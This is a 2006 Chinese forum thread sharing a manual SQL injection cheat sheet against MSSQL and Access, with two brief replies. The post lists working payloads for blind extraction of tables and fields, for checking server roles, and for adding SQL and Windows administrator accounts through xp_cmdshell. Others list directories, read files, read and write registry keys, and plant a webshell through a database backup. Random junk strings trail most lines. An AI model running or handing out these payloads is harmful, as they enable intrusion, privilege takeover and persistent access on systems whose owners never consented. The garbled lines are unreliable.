社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4193阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 @EQ{lGpU3  
  2.初步判断是否是mssql ;and user>0 B[$e;h*Aw[  
g (~&  
  3.注入参数是字符'and [查询条件] and ''=' <[q)2 5RL  
kO4C^pl"v  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' 4 qnQF]4  
]u:NE'0Xy  
  5.判断数据库系统 5u&jNU5m_  
mB\5bSFY`  
  ;and (select count(*) from sysobjects)>0 mssql u,C-U!A  
b&ADj8cKC  
  ;and (select count(*) from msysobjects)>0 access bIH2cJ  
1{wy%|H\  
5 xiYCOy  
y`N1I  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 `XD$1>  
q<1@ut  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 K,RIa0)  
D,7! /u'  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #8`G&S*  
R 'F|z{8  
  9.(1)猜字段的ascii值(access) cr!I"kTgD  
QK72 F  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0  A=,m  
YP6+o#==  
  (2)猜字段的ascii值(mssql) )KNFS,5  
R6!3Y/Q@  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 2@H~nw 0  
$OJ*Kul  
  10.测试权限结构(mssql) ^,X+ n5q;m  
HCP Be2  
/i]Gg \)  
eI[z%j[Y*  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- i"b*U5k  
>?kt3.IQ!X  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- qjWgyhL  
^8 z*f&g  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- *)w 8fq  
koUH>J:  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |h'ugx1iY  
MDlC U  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- iCH Z{<k  
#*~ (  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- .1}u0IbJ  
sC#Ixq'ls7  
  ;and 1=(select IS_MEMBER('db_owner'));-- (d (whlF  
M,9WF)p)V  
0t9G $23  
Fm@GU  
  11.添加mssql和系统的帐户 LR^b?.#>  
IuTTMAt  
  ;exec master.dbo.sp_addlogin username;-- LvR=uD  
  ;exec master.dbo.sp_password null,username,password;-- 55AG>j&41  
w#o<qrpHf  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 0 cQf_o  
:9)>!+|'  
  ;exec master.dbo.xp_cmdshell 'net user username password l +#`  
$Fo ,$  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- iX,Qh2(ig  
vEb~QX0~  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';--  *Vc}W  
j/W#=\xz  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- f(3#5288  
wCdUYgsPT"  
:s4CWE d  
A*$vk2VWw  
  12.(1)遍历目录 wM|-u/9+  
?GFVV->i  
  ;create table dirs(paths varchar(100), id int) -wO`o<  
# ><.zZ  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' Ao,lEjNI  
{!,+C0  
  ;and (select top 1 paths from dirs)>0 ='mqfGRi>  
k'{lo _  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) h.c)+wz/%C  
_x:K%1_[  
=e4,)Wd9&  
ve>8vw2  
  (2)遍历目录 Ar\`OhR  
#3qkG)  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- {u!,TDt*  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 g'IS8@  
&r_:n t  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 5ogbse"  
;eWVc;H  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 aB$Y5  
2. |Y  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 *z(.D\{%  
h+vKai  
dCc*<S  
 :&Ul  
  13.mssql中的存储过程 `T mIrc  
ZGS=;jM  
  xp_regenumvalues 注册表根键, 子键 t!K|3>w  
tV<A u  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 t!PFosFp  
1e&`m~5K+  
  xp_regread 根键,子键,键值名 h[ t OY  
8`im4.~#%  
  ;exec xp_regread No[>1]ds  
d+/d)cu  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 amPQU  
upX/fL c  
  xp_regwrite 根键,子键, 值名, 值类型, 值 Sd{>(YWx~  
SQEXC*08  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 =7$YBCuF  
F[J;u/Z  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 7%o\O{,U  
 - @  
  xp_regdeletevalue 根键,子键,值名 =EIsqk^*  
Hiw{1E:rW  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 NE/3aU  
;ymUMQ%;/  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 h'N,oDB)  
]o_ Ps|  
]A_)&`"Cb  
D L$P  
  14.mssql的backup创建webshell ."MBKyg6  
] qrO"X=  
  use model )[/+j"F   
>0f5Mjug  
  create table cmd(str image); n0EKNMO  
-]N/P{=L  
  insert into cmd(str) values (''); $ biCm$a  
vuD tEz  
  backup database model to disk='c:\l.asp'; r R."_Z2  
>SccoI  
6 Iup4sP  
~DCw [y  
  15.mssql内置函数 hmks\eb~  
\l#=p+x5  
  ;and (select @@version)>0 获得Windows的版本号 }B"kJNxV  
O-G4^V8  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa g6nBu  
mvYr"6f8  
  ;and (select user_name())>0 爆当前系统的连接用户 }J:~}?^%n  
.lqo>Ta y  
  ;and (select db_name())>0 得到当前连接的数据库 rJR"[TTJ  
}mX;0qO  
q7X /"Dfx  
> Y LwWU<X  
  16.简洁的webshell :^px1  
4Jht{#IIG  
  use model B:Msn)C~  
sfx:j~bsL  
  create table cmd(str image); _< xU"8b"5  
xH*OEzN  
  insert into cmd(str) values (''); Ff.gRx  
/\C9FGS  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
10+5=?,请输入中文答案:十五